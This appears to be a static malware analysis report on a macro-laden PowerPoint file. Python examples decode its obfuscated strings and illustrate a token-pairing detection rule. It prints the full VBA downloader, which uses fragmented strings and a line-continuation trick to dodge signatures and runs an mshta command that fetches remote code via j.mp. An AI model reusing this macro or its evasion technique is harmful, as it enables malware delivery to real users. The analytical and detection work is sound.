Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 0ae4bb2ac7566fb1…

MALICIOUS

Office (OLE) / .PPT

Size: 71.0 KB
Created: 2020-08-09 23:10:45
Authoring application: Microsoft Office PowerPoint
First seen: 2026-05-13
MD5: b4788f05015209ab039cd339fd2562de
SHA-1: b1c5c2dc5fcccb17ea023866287f95e7cc5ae24d
SHA-256: 0ae4bb2ac7566fb16d4b476a21bb8c973812a3cd0f34cea1a7087911905152e8
Risk score: 108

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic T1218.005 System Binary Proxy Execution: Mshta

The VBA macros in this PowerPoint file build their strings one fragment at a time and pass them through throw-away aliases before concatenating them. Function hireme assembles 'WScript.Shell'; functions suckmydickfornoreason10 and suckmydickfornoreason11 assemble 'mshta ' and 'http://%40%40%40%40@j.mp/567sadghada5agdha', which together form the command 'mshta http://%40%40%40%40@j.mp/567sadghada5agdha'. The entry point is declared as 'Sub _' with the name Auto_Close() on the following line: a VBA line continuation that defeats signatures keyed on the literal text 'Sub Auto_Close' while still compiling to an auto-exec procedure. Auto_Close calls yari1, which uses CreateObject to instantiate WScript.Shell and runs the command through its Exec method. Everything before the '@' in the URL (%40%40%40%40, which decodes to '@@@@') is treated as credentials rather than as the host, so the host actually contacted is j.mp, a Bitly URL shortener; mshta then executes whatever HTA content the shortened link redirects to. This indicates the macro is designed to download and execute a second-stage payload from that URL when the document is closed. The final destination cannot be recovered from the file alone, and because PowerPoint, unlike Word and Excel, runs Auto_Open/Auto_Close automatically only for macros in a loaded add-in (.ppa/.ppam), whether the entry point fires for this .PPT as delivered should be confirmed by detonation.
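The concatenation described above can be resolved mechanically instead of by hand. The following Python script is an added example, not part of the report or of its analysis tooling: it parses the decoded macros.bas text (reproduced from the extracted artifact below, blank lines dropped), evaluates each Function's '+'-concatenations and local aliases, recovers the object name and command handed to CreateObject(...).Exec, and then splits the URL to show that the %40-encoded userinfo hides the real host. It handles only the pattern this sample uses (string literals, local aliases and zero-argument functions; a literal containing '+' would not be handled); the regexes and function names are the example's own.

```python
import re
from urllib.parse import unquote, urlsplit

# Extracted macro source (macros.bas) as shown in the report, blank lines dropped.
MACRO_SRC = '''Attribute VB_Name = "ab1"
Function suckmydickfornoreason11()
suckmydickfornoreason6 = "h"
suckmydickfornoreason7 = "t"
suckmydickfornoreason8 = "t"
suckmydickfornoreason9 = "p://%40%40%40%40@j.mp/567sadghada5agdha"
antivirusarescam_6 = suckmydickfornoreason6
antivirusarescam_7 = suckmydickfornoreason7
antivirusarescam_8 = suckmydickfornoreason8
antivirusarescam_9 = suckmydickfornoreason9
suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9
End Function
Attribute VB_Name = "ab2"
Function suckmydickfornoreason10()
suckmydickfornoreason1 = "m"
suckmydickfornoreason2 = "s"
suckmydickfornoreason3 = "h"
suckmydickfornoreason4 = "t"
suckmydickfornoreason5 = "a "
antivirusarescam_1 = suckmydickfornoreason1
antivirusarescam_2 = suckmydickfornoreason2
antivirusarescam_3 = suckmydickfornoreason3
antivirusarescam_4 = suckmydickfornoreason4
antivirusarescam_5 = suckmydickfornoreason5
suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5
End Function
Attribute VB_Name = "final"
Function yari1()
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
End Function
Attribute VB_Name = "main"
Sub _
Auto_Close()
yari1
End Sub
Attribute VB_Name = "po1"
Function hireme()
thisis = "WScr"
your = "ipt."
fucking = "She"
security = "ll"
iamhere = thisis
totellyou = your
yoursecurity = fucking
sucks = security
hireme = iamhere + totellyou + yoursecurity + sucks
End Function
'''

FUNC_RE = re.compile(r'^Function\s+(\w+)\s*\(\)\s*$(.*?)^End Function', re.M | re.S)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.M)
EXEC_RE = re.compile(r'CreateObject\((\w+)\)\.Exec\s+(.+)')

def parse_functions(src):
    """Map each Function name to its {variable: rhs-expression} assignments (last one wins)."""
    return {m.group(1): dict(ASSIGN_RE.findall(m.group(2))) for m in FUNC_RE.finditer(src)}

def eval_expr(expr, funcs, local_vars):
    """Evaluate a '+'-concatenation of string literals, local aliases and function calls."""
    out = []
    for tok in (t.strip() for t in expr.split('+')):
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            out.append(tok[1:-1].replace('""', '"'))     # VBA doubles quotes inside literals
        elif tok in local_vars:
            out.append(eval_expr(local_vars[tok], funcs, local_vars))
        elif tok in funcs:
            out.append(call_function(tok, funcs))
        else:
            raise ValueError(f'unresolved token {tok!r}')
    return ''.join(out)

def call_function(name, funcs):
    """A VBA Function returns whatever was last assigned to its own name."""
    local_vars = funcs[name]
    if name not in local_vars:
        raise ValueError(f'{name} never assigns its return value')
    return eval_expr(local_vars[name], funcs, local_vars)

def recover_command(src):
    """Return (COM object name, command string) passed to CreateObject(...).Exec."""
    funcs = parse_functions(src)
    m = EXEC_RE.search(src)
    if m is None:
        raise ValueError('no CreateObject(...).Exec call found')
    return call_function(m.group(1), funcs), eval_expr(m.group(2), funcs, {})

def split_command(cmd):
    """Split 'binary url' and expose the real host behind a userinfo-padded URL."""
    binary, _, url = cmd.partition(' ')
    parts = urlsplit(url)
    return {'binary': binary, 'host': parts.hostname,
            'userinfo': unquote(parts.username or ''), 'path': parts.path}
```

recover_command(MACRO_SRC) returns ('WScript.Shell', 'mshta http://%40%40%40%40@j.mp/567sadghada5agdha'), and split_command on that command reports binary mshta, host j.mp, userinfo '@@@@' and path /567sadghada5agdha, which is what should go into the indicator list (the host, not the '@@@@@j.mp' string a casual read of the URL suggests).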

Heuristics 4

  • VBA macros detected (severity: medium; rule OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
    CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro (severity: low; rule OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
    Auto_Close()
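To make the pairing rule concrete, the following Python is an added example, not the report's detection engine (which matches on the compiled p-code stream rather than on decoded source): it scans VBA text for the two token classes listed in the rule, fires only when both classes are present, and first joins VBA line continuations so that the 'Sub _' / 'Auto_Close()' split used in this sample cannot hide the entry point from a signature keyed on the literal 'Sub Auto_Close'. The three sample strings are constructed; AUTOEXEC, EXEC_TOKENS and the function names are the example's own.

```python
import re

# Token classes copied from the OLE_VBA_PCODE_AUTOEXEC_EXEC rule description above.
AUTOEXEC = ('Auto_Open', 'AutoOpen', 'Document_Open', 'Workbook_Open',
            'Auto_Close', 'AutoClose')
EXEC_TOKENS = ('Shell', 'CreateObject', 'GetObject', 'PowerShell', 'cmd.exe',
               'URLDownloadToFile', 'WinHttp', 'XMLHTTP', 'ADODB.Stream',
               'ShellExecute', 'ExecuteExcel4Macro')

def join_continuations(src):
    """VBA joins a line ending in ' _' with the next line; undo that before matching."""
    return re.sub(r'[ \t]+_[ \t]*\r?\n[ \t]*', ' ', src)

def find_tokens(text, tokens):
    """Case-insensitive whole-identifier matches (VBA is case-insensitive); 'Shell' must not
    match inside 'ShellExecute', and a split literal such as "She" + "ll" is not found at all."""
    return [t for t in tokens
            if re.search(r'(?<!\w)' + re.escape(t) + r'(?!\w)', text, re.I)]

def pcode_autoexec_exec(src):
    """Fire only when an auto-exec entry point AND an execution token co-occur."""
    text = join_continuations(src)
    auto = find_tokens(text, AUTOEXEC)
    execs = find_tokens(text, EXEC_TOKENS)
    return {'fires': bool(auto) and bool(execs), 'autoexec': auto, 'exec': execs}

def naive_sub_autoclose(src):
    """A signature keyed on the literal 'Sub Auto_Close', for comparison."""
    return re.search(r'\bSub\s+Auto_Close\b', src, re.I) is not None

# Constructed samples. The first mirrors the report's 'Sub _' / 'Auto_Close()' layout.
SAMPLE_EVASIVE = ('Attribute VB_Name = "main"\nSub _\nAuto_Close()\nyari1\nEnd Sub\n'
                  'Function yari1()\nCreateObject(hireme).Exec payload\nEnd Function\n')
SAMPLE_AUTOEXEC_ONLY = 'Sub Auto_Open()\nMsgBox "hello"\nEnd Sub\n'
SAMPLE_EXEC_ONLY = ('Sub Helper()\nSet fso = CreateObject("Scripting.FileSystemObject")\n'
                    'End Sub\n')
```

On SAMPLE_EVASIVE the literal-text signature returns False until the continuation is joined, while the token pairing fires with autoexec ['Auto_Close'] and exec ['CreateObject']; the two single-class samples each report their one token class but do not fire, which is the behaviour the rule description specifies.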

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1598 bytes
SHA-256: ecd0037a17c215b62647734fa82db9677f873cdaa56002f2c8fd601f837c262b
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ab1"
Function suckmydickfornoreason11()
suckmydickfornoreason6 = "h"
suckmydickfornoreason7 = "t"
suckmydickfornoreason8 = "t"
suckmydickfornoreason9 = "p://%40%40%40%40@j.mp/567sadghada5agdha"
antivirusarescam_6 = suckmydickfornoreason6
antivirusarescam_7 = suckmydickfornoreason7
antivirusarescam_8 = suckmydickfornoreason8
antivirusarescam_9 = suckmydickfornoreason9

suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9
End Function




Attribute VB_Name = "ab2"
Function suckmydickfornoreason10()
suckmydickfornoreason1 = "m"
suckmydickfornoreason2 = "s"
suckmydickfornoreason3 = "h"
suckmydickfornoreason4 = "t"
suckmydickfornoreason5 = "a "
antivirusarescam_1 = suckmydickfornoreason1
antivirusarescam_2 = suckmydickfornoreason2
antivirusarescam_3 = suckmydickfornoreason3
antivirusarescam_4 = suckmydickfornoreason4
antivirusarescam_5 = suckmydickfornoreason5


suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5

End Function



Attribute VB_Name = "final"
Function yari1()
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
End Function

Attribute VB_Name = "main"
Sub _
Auto_Close()
yari1
End Sub

Attribute VB_Name = "po1"
Function hireme()
thisis = "WScr"
your = "ipt."
fucking = "She"
security = "ll"
iamhere = thisis
totellyou = your
yoursecurity = fucking
sucks = security
hireme = iamhere + totellyou + yoursecurity + sucks
End Function